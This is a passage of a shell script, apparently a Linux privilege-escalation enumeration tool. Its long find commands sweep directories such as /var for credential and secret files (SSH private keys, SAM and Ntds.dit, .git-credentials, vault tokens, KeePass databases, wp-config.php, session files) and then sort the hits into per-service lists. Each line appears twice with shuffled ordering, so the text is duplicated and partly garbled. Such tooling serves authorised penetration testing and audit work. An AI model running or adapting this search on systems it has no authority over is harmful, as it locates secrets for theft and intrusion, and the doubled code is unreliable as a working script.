-name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"sess_*\" -o -name \"000-default.conf\" -o -name \"ffftp.ini\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_VAR=`eval_bckgrd "find /var -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \"sess_*\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
wait # Always wait at the end wait # Always wait at the end
CONT_THREADS=0 #Reset the threads counter CONT_THREADS=0 #Reset the threads counter
#GENERATE THE STORAGES OF THE FOUND FILES #GENERATE THE STORAGES OF THE FOUND FILES
PSTORAGE_SYSTEMD=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/usr|^/lib64|^/opt|^/systemd|^/bin|^/etc|^/lib32|^/private|^/run|^/tmp|^/lib|^/system|^/applications|^/.cache|^/srv|^/snap|^$GREPHOMESEARCH|^/sbin|^/sys|^/var|^/mnt|^/cdrom|^/media" | grep -E ".*\.service$" | sort | uniq | head -n 70) PSTORAGE_SYSTEMD=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/snap|^/bin|^/tmp|^/.cache|^/sys|^/etc|^/run|^/srv|^/media|^/var|^/cdrom|^/systemd|^/sbin|^/lib64|^/private|^/lib|^$GREPHOMESEARCH|^/applications|^/mnt|^/system|^/opt|^/usr|^/lib32" | grep -E ".*\.service$" | sort | uniq | head -n 70)
PSTORAGE_TIMER=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/usr|^/lib64|^/opt|^/systemd|^/bin|^/etc|^/lib32|^/private|^/run|^/tmp|^/lib|^/system|^/applications|^/.cache|^/srv|^/snap|^$GREPHOMESEARCH|^/sbin|^/sys|^/var|^/mnt|^/cdrom|^/media" | grep -E ".*\.timer$" | sort | uniq | head -n 70) PSTORAGE_TIMER=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/snap|^/bin|^/tmp|^/.cache|^/sys|^/etc|^/run|^/srv|^/media|^/var|^/cdrom|^/systemd|^/sbin|^/lib64|^/private|^/lib|^$GREPHOMESEARCH|^/applications|^/mnt|^/system|^/opt|^/usr|^/lib32" | grep -E ".*\.timer$" | sort | uniq | head -n 70)
PSTORAGE_SOCKET=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/usr|^/lib64|^/opt|^/systemd|^/bin|^/etc|^/lib32|^/private|^/run|^/tmp|^/lib|^/system|^/applications|^/.cache|^/srv|^/snap|^$GREPHOMESEARCH|^/sbin|^/sys|^/var|^/mnt|^/cdrom|^/media" | grep -E ".*\.socket$" | sort | uniq | head -n 70) PSTORAGE_SOCKET=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/snap|^/bin|^/tmp|^/.cache|^/sys|^/etc|^/run|^/srv|^/media|^/var|^/cdrom|^/systemd|^/sbin|^/lib64|^/private|^/lib|^$GREPHOMESEARCH|^/applications|^/mnt|^/system|^/opt|^/usr|^/lib32" | grep -E ".*\.socket$" | sort | uniq | head -n 70)
PSTORAGE_DBUS=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/etc" | grep -E "system\.d$" | sort | uniq | head -n 70) PSTORAGE_DBUS=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/etc" | grep -E "system\.d$" | sort | uniq | head -n 70)
PSTORAGE_MYSQL=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -v -E 'mysql/mysql' | grep -E '^/etc/.*mysql|/usr/var/lib/.*mysql|/var/lib/.*mysql' | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "mysql$" | sort | uniq | head -n 70) PSTORAGE_MYSQL=$(echo -e "$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -v -E 'mysql/mysql' | grep -E '^/etc/.*mysql|/usr/var/lib/.*mysql|/var/lib/.*mysql' | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "mysql$" | sort | uniq | head -n 70)
PSTORAGE_MARIADB=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "mariadb\.cnf$|debian\.cnf$" | sort | uniq | head -n 70) PSTORAGE_MARIADB=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "mariadb\.cnf$|debian\.cnf$" | sort | uniq | head -n 70)
PSTORAGE_POSTGRESQL=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "pgadmin.*\.db$|pg_hba\.conf$|postgresql\.conf$|pgsql\.conf$" | sort | uniq | head -n 70) PSTORAGE_POSTGRESQL=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "pgadmin.*\.db$|pg_hba\.conf$|postgresql\.conf$|pgsql\.conf$" | sort | uniq | head -n 70)
PSTORAGE_APACHE=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "sites-enabled$|000-default\.conf$|php\.ini$" | sort | uniq | head -n 70) PSTORAGE_APACHE=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC\n$FIND_DIR_CDROM\n$FIND_DIR_MEDIA\n$FIND_DIR_SBIN\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_PRIVATE\n$FIND_DIR_SNAP\n$FIND_DIR_SRV\n$FIND_DIR_USR\n$FIND_DIR_VAR\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_BIN" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "sites-enabled$|000-default\.conf$|php\.ini$" | sort | uniq | head -n 70)
PSTORAGE_PHP_SESSIONS=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E '/tmp/.*sess_.*|/var/tmp/.*sess_.*' | grep -E "^/private|^/tmp|^/mnt|^/var" | grep -E "sess_.*$" | sort | uniq | head -n 70) PSTORAGE_PHP_SESSIONS=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E '/tmp/.*sess_.*|/var/tmp/.*sess_.*' | grep -E "^/var|^/private|^/mnt|^/tmp" | grep -E "sess_.*$" | sort | uniq | head -n 70)
PSTORAGE_PHP_FILES=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E ".*config.*\.php$|database\.php$|db\.php$|storage\.php$|settings\.php$" | sort | uniq | head -n 70) PSTORAGE_PHP_FILES=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E ".*config.*\.php$|database\.php$|db\.php$|storage\.php$|settings\.php$" | sort | uniq | head -n 70)
PSTORAGE_WORDPRESS=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "wp-config\.php$" | sort | uniq | head -n 70) PSTORAGE_WORDPRESS=$(echo -e "$FIND_SRV\n$FIND_CDROM\n$FIND_LIB64\n$FIND_TMP\n$FIND_LIB\n$FIND_MNT\n$FIND_HOMESEARCH\n$FIND_SYSTEMD\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_RUN\n$FIND_SYSTEM\n$FIND_CACHE\n$FIND_USR\n$FIND_APPLICATIONS\n$FIND_SNAP\n$FIND_VAR\n$FIND_BIN\n$FIND_SYS\n$FIND_SBIN\n$FIND_OPT\n$FIND_PRIVATE\n$FIND_ETC" | grep -E "^/opt|^/snap|^$GREPHOMESEARCH|^/bin|^/sbin|^/srv|^/tmp|^/.cache|^/applications|^/media|^/mnt|^/var|^/usr|^/cdrom|^/private|^/etc" | grep -E "wp-config\.php$" | sort | uniq | head -n 70)
